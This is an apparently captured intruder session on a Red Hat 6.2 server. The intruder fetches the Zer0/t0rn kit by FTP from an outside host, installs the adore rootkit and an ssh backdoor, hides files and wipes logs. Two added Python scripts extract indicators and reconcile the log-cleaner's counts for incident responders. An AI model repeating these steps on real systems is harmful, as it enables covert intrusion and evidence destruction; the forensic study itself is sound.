Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login: nobody
Last login: Sun Sep 16 04:32:21 from 217.156.93.166
sh: ulimit: cannot modify limit: Operation not permitted
sh-2.03$ su dns
nobody@ns1: /[root@ns1 /]# w
4:49am up 3 days, 10:57, 1 user, load average: 0.00, 0.00, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
nobody pts/0 217.156.93.166 4:49am 0.00s 1.02s ? -
nobody@ns1: /[root@ns1 /]# cd /tmp
nobody@ns1: /tmp[root@ns1 /tmp]# mc -s
bash: mc: command not found
nobody@ns1: /tmp[root@ns1 /tmp]# cd /dev/rd
nobody@ns1: /dev/rd[root@ns1 rd]# ftp teleport.go.ro

nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]# mkdir sdc0
nobody@ns1: /dev/rd[root@ns1 rd]# cd sdc0
nobody@ns1: /dev/rd[root@ns1 rd]# ls
nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]# ftp teleport.go.ro

connected to teleport.go.ro
220-
220-
220- H O M E . R O
220-
220- This server is for HOME.RO members only.
220- Go to http://www.home.ro/ to register .
220-
220- No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42]
Name (teleport.go.ro:nobody): teleport
331 Password required for teleport.
331 Password: gunoierul
230 User teleport logged in.
Remote System Type is UNIX.
using binary mode to transfer files.
ftp> cd new
250 CWD command successful.
ftp> get Zer0.tar.gz
local: Zer0.tar.gz remote: Zer0.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).
226 Transfer completed.
139711 bytes received in 7.76 secs (18 Kbytes/sec)
ftp> get copy.tar.gz
local: copy.tar.gz remote: copy.tar.gz
200 PORT command successful
150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).
226 Transfer completed.
265189 bytes received in 14.6 secs (18 Kbytes/sec)
ftp> get ooty.tar.gz
local: ooty.tar.gz remote: ooty.tar.gz
200 PORT command successful
150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes)
226 Transfer completed
14847 bytes received in 0.856 secs (17 Kbytes/sec)
ftp> bye
221 Goodbye.
nobody@ns1: /dev/rd/sdc0[root@ns1 rd]# tar zxvf Zer0.tar.gz
Zer0/
tar: Archive contains future timestamp 2001-09-16 20:26:34
Zer0/Go
Zer0/ssh.tgz
Zer0/tls.tgz
Zer0/adr.tgz
Zer0/adr2.tgz
tar: Archive contains future timestamp 2001-09-16 20:27:45
Zer0/adore.h
nobody@ns1: /dev/rd/sdc0[root@ns1 rd]# cd Zer0/
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 rd]# ls
Go adore.h adr.tgz adr2.tgz ssh.tgz tls.tgz
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 rd]# ./Go 24
syslogd: no process killed
====================================================================

.oooo. oooo o8o .
.o8 d8P''Y8b '888 ''' .o8
.o888oo 888 888 oooo d8b ooo. .oo. 888 oooo oooo .o888oo
888 888 888 '888''8P '888P'Y88b 888 .8P' '888 888
888 888 888 888 888 888 888888. 888 888
888 . '88b d88' 888 888 888 888 '88b. 888 888 .
'888' 'Y8bd8P' d888b o888o o888o o888o o888o o888o '888'

Modificat de mine... Viruzzel (Modified by me... Viruzzel)
====================================================================
backdooring started on ns1
# #
# #
checking for remote logging...
holy guacamole batman

${RED} REMOTE LOGGING DETECTED ${RES}
${WHI} I hope you can get to these other computer(s): ${RES}

000.000.00.000

${WHI} cuz this computer is LOGGING to it... ${RES}

--------------------------------------------------------------------
# [Droping files...]
--------------------------------------------------------------------

nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 rd]#
[root@ns1 Zer0]#
exit
.t0rn/
.t0rn/shhk
.t0rn/shrs
.t0rn/shhk.pub
.t0rn/shsml
.t0rn/sharsed
.t0rn/shdcf2
.t0rn/shhash
EOT
CVS/
CVS/Root
CVS/Repository
CVS/Entries
CVS/Tag
Makefile.gen
tar: Archive contains future timestamp 2029-09-09 09:05:12
adore.c
adore.h
ava.c
cleaner.c
cnfad
dummy.c
libinvisible.c
libinvisible.h
pass
rename.c
stad
lgstrip
nscd.init
patch
vrssb
vrssnf
vrssnk
--------------------------------------------------------------------
# [Installing trojans...]
--------------------------------------------------------------------
# Using ssh-port : 24

--------------------------------------------------------------------
[System Information...]
--------------------------------------------------------------------
Hostname : ns1 (192.168.1.102)
Arch : i586 -+- bogomips : 187.19 '
Alternative IP : 127.0.0.1 -+- Might be [ 1 ] active adapters.
Distribution: Red Hat Linux release 6.2 (Zoot)

--------------------------------------------------------------------
ipchains ...?
--------------------------------------------------------------------
Chain input (policy ACCEPT):
--------------------------------------------------------------------
# [Searching for Make, gcc...]
--------------------------------------------------------------------
Make found!
gcc found!
--------------------------------------------------------------------
# [Installing adore...]
--------------------------------------------------------------------

Starting adore configuration ...

Checking 4 ELITE_UID ... found 30
Checking 4 ELITE_CMD ...
using 107613
Checking 4 SMP ... NO
Checking 4 MODVERSIONS ... YES
Checking for kgcc ... found cc
Checking 4 insmod ... found /sbin/insmod -- OK

Loaded modules:
lockd 31592 1 (autoclean)
sunrpc 53540 1 (autoclean) [lockd]
pcnet32 10692 1 (autoclean)


Since version 0.33 Adore requires 'authentication' for
its services. You will be prompted for a password now and this
password will be compiled into 'adore' and 'ava' so no further actions
by you are required.
This procedure will save adore from scanners.
Try to choose a unique name that won't clash with normal calls to mkdir(2).
Password (echoed): labutza


Preparing /usr/X11R6/bin/.,/copy/adr (== cwd) for hiding ...

Creating Makefile ...

*** Edit adore.h for the hidden services and redirected file-access ***
cp: Makefile: No such file or directory
make: *** Warning: File `adore.c' has modification time in the future (2029-09-09 09:05:12 > 2001-09-16 05:02:21)
rm -f adore.o
cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS adore.c -o adore.o
adore.c:484: warning: `/*' within comment
cc -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS ava.c libinvisible.c -o ava
cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS cleaner.c
make: *** Warning: Clock skew detected. Your build may be incomplete.
ava found... proceeding!
sniffer running!
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/X11R6/bin/.,' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/info/.t0rn' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/dev/rd/sdc0' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/dev/rd/nscd.init' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/etc/rc.d/rc3.d/S50inet' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/X11R6/lib/X11/.~' hided.
done hiding...
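What an incident responder should carry away from the session up to this point, as an added example (not part of the capture and not the attackers' tooling): a Python script that pulls the indicators out of the installer's own chatter and the FTP dialogue (staging host and credentials, payload names and sizes, the backdoor ssh port, the constants compiled into adore, and the paths adore was told to hide), then checks a mounted disk image for those paths. The session excerpt embedded in the script is a trimmed copy of the lines above; the paths planted in the throwaway directory tree are constructed for the demo.

```python
"""IOC extraction from the captured Zer0 / t0rn / adore install session.

Added example for this page; it is not part of the capture and not the
attackers' tooling. It parses the installer's own chatter and the FTP
dialogue into indicators an incident responder would carry forward, then
checks a mounted image for the paths adore was told to hide.
"""
import os
import re
import tempfile

# Constructed, trimmed excerpt of the session above (same wording).
SESSION = r"""
connected to teleport.go.ro
220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42]
Name (teleport.go.ro:nobody): teleport
331 Password: gunoierul
150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).
150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).
150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes)
# Using ssh-port : 24
cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS adore.c -o adore.o
File '/usr/X11R6/bin/.,' hided.
File '/usr/info/.t0rn' hided.
File '/dev/rd/sdc0' hided.
File '/dev/rd/nscd.init' hided.
File '/etc/rc.d/rc3.d/S50inet' hided.
File '/usr/X11R6/lib/X11/.~' hided.
"""

FTP_HOST_RE = re.compile(r"^connected to (\S+)", re.M)
FTP_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FTP_USER_RE = re.compile(r"^Name \([^)]*\): (\S+)", re.M)
FTP_PASS_RE = re.compile(r"^331 Password: (\S+)", re.M)
PAYLOAD_RE = re.compile(r"data connection for (\S+) \((\d+) bytes\)")
HIDDEN_RE = re.compile(r"^File '(.+)' hided\.$", re.M)
PORT_RE = re.compile(r"Using ssh-port\s*:\s*(\d+)")
# The make output shows the shell-escaped form -DADORE_KEY=\"labutza\".
DEFINE_RE = re.compile(r"-D(ELITE_CMD|ELITE_UID|ADORE_KEY)=(\S+)")


def _first(rx, text):
    m = rx.search(text)
    return m.group(1) if m else None


def extract_iocs(text):
    """Return a dict of indicators pulled from the session text."""
    consts = {k: v.replace('\\"', '').strip('"') for k, v in DEFINE_RE.findall(text)}
    port = _first(PORT_RE, text)
    return {
        "staging_host": _first(FTP_HOST_RE, text),
        "staging_ip": _first(FTP_IP_RE, text),
        "staging_user": _first(FTP_USER_RE, text),
        "staging_password": _first(FTP_PASS_RE, text),
        "payloads": {name: int(size) for name, size in PAYLOAD_RE.findall(text)},
        "backdoor_ssh_port": int(port) if port else None,
        "adore": consts,
        "hidden_paths": HIDDEN_RE.findall(text),
    }


def check_image(root, paths):
    """Map each path to whether it exists under a mounted image root.

    lexists() is used so a dangling symlink still counts as present. Adore
    filters directory listings (getdents), not opens by exact name, so on
    the live box a by-name probe may still succeed; an image mounted from a
    trusted boot medium is the reliable place to run this.
    """
    return {p: os.path.lexists(os.path.join(root, p.lstrip("/"))) for p in paths}


def demo():
    """Plant two of the hidden paths in a throwaway tree (constructed) and run the check."""
    iocs = extract_iocs(SESSION)
    with tempfile.TemporaryDirectory() as root:
        for p in ("/usr/info/.t0rn", "/dev/rd/sdc0"):
            os.makedirs(os.path.join(root, p.lstrip("/")))
        hits = check_image(root, iocs["hidden_paths"])
    return iocs, hits


if __name__ == "__main__":
    iocs, hits = demo()
    for key, value in iocs.items():
        print(f"{key}: {value}")
    print("present in image:", [p for p, ok in hits.items() if ok])
```

The FTP password and the adore key are worth recording alongside the paths: the installer compiled the key into both the module and its `ava` control tool, and the same staging account and key string may turn up again on other machines hit with the same kit.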

--------------------------------------------------------------------
# [hmmm...nothing to worry about, for you, hehehe...]
--------------------------------------------------------------------
USE this file for testing purposes ONLY ... tested on RH6.2
Login backdooring started ...
Step 1: Setting login parameters ... [ OK ]
Step 2: Setting su parameters ... [ OK ]
Step 3: Creating config files ... [ OK ]

Done??!!?hmmm.. who knows... :P I DO! hihihi
--------------------------------------------------------------------
# [Removing unnecessary files.. cleaning...]
--------------------------------------------------------------------
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...
0 lines removed!
* Cleaning boot.log.1 (133 lines)...
0 lines removed!
* Cleaning cron (8 lines)...
0 lines removed!
* Cleaning cron.1 (599 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...
0 lines removed!
* Cleaning htmlaccess.log (0 lines)...
0 lines removed!
* Cleaning maillog (0 lines)...
0 lines removed!
* Cleaning maillog.1 (24 lines)...
0 lines removed!
* Cleaning messages (0 lines)...
0 lines removed!
* Cleaning messages.1 (383 lines)...
6 lines removed!
* Cleaning netconf.log (0 lines)...
0 lines removed!
* Cleaning secure (0 lines)...
0 lines removed!
* Cleaning secure.1 (52 lines)...
10 lines removed!
* Cleaning sendmail.st (0 lines)...
-1 lines removed!
* Cleaning spooler (0 lines)...
0 lines removed!
* Cleaning spooler.1 (0 lines)...
0 lines removed!
* Cleaning xferlog (0 lines)...
0 lines removed!
* Cleaning xferlog.1 (0 lines)...
0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister ! (All clean, my master!)
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...
0 lines removed!
* Cleaning boot.log.1 (133 lines)...
0 lines removed!
* Cleaning cron (8 lines)...
0 lines removed!
* Cleaning cron.1 (599 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...
0 lines removed!
* Cleaning htmlaccess.log (0 lines)...
0 lines removed!
* Cleaning maillog (0 lines)...
0 lines removed!
* Cleaning maillog.1 (24 lines)...
0 lines removed!
* Cleaning messages (0 lines)...
0 lines removed!
* Cleaning messages.1 (377 lines)...
1 lines removed!
* Cleaning netconf.log (0 lines)...
0 lines removed!
* Cleaning secure (0 lines)...
0 lines removed!
* Cleaning secure.1 (42 lines)...
26 lines removed!
* Cleaning sendmail.st (1 lines)...
0 lines removed!
* Cleaning spooler (0 lines)...
0 lines removed!
* Cleaning spooler.1 (0 lines)...
0 lines removed!
* Cleaning xferlog (0 lines)...
0 lines removed!
* Cleaning xferlog.1 (0 lines)...
0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister ! (All clean, my master!)
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...
0 lines removed!
* Cleaning boot.log.1 (133 lines)...
0 lines removed!
* Cleaning cron (8 lines)...
0 lines removed!
* Cleaning cron.1 (599 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...
0 lines removed!
* Cleaning htmlaccess.log (0 lines)...
0 lines removed!
* Cleaning maillog (0 lines)...
0 lines removed!
* Cleaning maillog.1 (24 lines)...
0 lines removed!
* Cleaning messages (0 lines)...
0 lines removed!
* Cleaning messages.1 (376 lines)...
0 lines removed!
* Cleaning netconf.log (0 lines)...
0 lines removed!
* Cleaning secure (0 lines)...
0 lines removed!
* Cleaning secure.1 (16 lines)...
0 lines removed!
* Cleaning sendmail.st (1 lines)...
0 lines removed!
* Cleaning spooler (0 lines)...
0 lines removed!
* Cleaning spooler.1 (0 lines)...
0 lines removed!
* Cleaning xferlog (0 lines)...
0 lines removed!
* Cleaning xferlog.1 (0 lines)...
0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister ! (All clean, my master!)
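The three sauber passes above state, for every log, how many lines the file had and how many were removed, and those numbers chain from one pass to the next. That lets an analyst recover how much was cut overall even though the lines themselves are gone. Added example (not part of the capture and not the cleaner itself): a Python parser over a trimmed, constructed copy of the cleaner output above that reconciles the counts and flags the logs that were touched.

```python
"""Reconcile the line counts reported by the 'sauber' log cleaner.

Added example for this page; not part of the capture and not the cleaner
itself. The cleaner prints, per pass, how many lines each log had and how
many it removed; chaining those numbers across passes tells an analyst
which logs were touched and by how much.
"""
import re

# Constructed, trimmed copy of the three cleaner passes above. The
# 'Alles sauber' line is what the tool prints at the end of each pass and
# is used here as the pass delimiter.
CLEANER_OUTPUT = """\
* Cleaning messages.1 (383 lines)...
6 lines removed!
* Cleaning secure.1 (52 lines)...
10 lines removed!
* Cleaning sendmail.st (0 lines)...
-1 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Alles sauber mein Meister !
* Cleaning messages.1 (377 lines)...
1 lines removed!
* Cleaning secure.1 (42 lines)...
26 lines removed!
* Cleaning sendmail.st (1 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...
0 lines removed!
* Alles sauber mein Meister !
* Cleaning messages.1 (376 lines)...
0 lines removed!
* Cleaning secure.1 (16 lines)...
0 lines removed!
* Cleaning sendmail.st (1 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...
0 lines removed!
* Alles sauber mein Meister !
"""

# One entry; the removed count may follow on the same line or on the next.
ENTRY_RE = re.compile(r"\* Cleaning (\S+) \((-?\d+) lines\)\.\.\.\s*(-?\d+) lines removed!")
PASS_END = "Alles sauber"


def parse_passes(text):
    """Split the output into passes: a list of {log: (lines_before, lines_removed)}."""
    passes = []
    for chunk in text.split(PASS_END):
        entries = {name: (int(before), int(removed))
                   for name, before, removed in ENTRY_RE.findall(chunk)}
        if entries:
            passes.append(entries)
    return passes


def reconcile(passes):
    """Per log: counts seen at the start of each pass, total removed, and
    whether the chain is consistent (next count == previous count - removed)."""
    report = {}
    for name in sorted({n for p in passes for n in p}):
        seq = [p[name] for p in passes if name in p]
        consistent = all(seq[i + 1][0] == seq[i][0] - seq[i][1]
                         for i in range(len(seq) - 1))
        report[name] = {
            "counts": [before for before, _ in seq],
            "removed": sum(removed for _, removed in seq),
            "consistent": consistent,
        }
    return report


def touched(report):
    """Logs with a nonzero removal count: the ones to pull from remote syslog or backup."""
    return sorted(name for name, r in report.items() if r["removed"] != 0)


if __name__ == "__main__":
    rep = reconcile(parse_passes(CLEANER_OUTPUT))
    for name, r in rep.items():
        print(f"{name:12} counts={r['counts']} removed={r['removed']} consistent={r['consistent']}")
    print("touched:", touched(rep))
```

On the counts above, messages.1 went 383, 377, 376 (7 lines gone) and secure.1 went 52, 42, 16 (36 lines gone); both chains are arithmetically consistent, so the cleaner's own accounting can be trusted as far as it goes. The -1 on sendmail.st is the tool tripping over a non-text file and is flagged only because it is nonzero. With those numbers in hand, the rotated copies of messages and secure from the remote syslog host the installer itself warned about, or from backup, are where the missing entries will be.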
--------------------------------------------------------------------
# [Linking /bin/.bash_history, adjusting time...]
--------------------------------------------------------------------
====================================================================
HIHIHI.. CICA GATA.. AM TERMINAT!! (HIHIHI.. SUPPOSEDLY DONE.. I'M FINISHED!!) Zer0... by Viruzzel
====================================================================
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]#
exit
sh-2.03$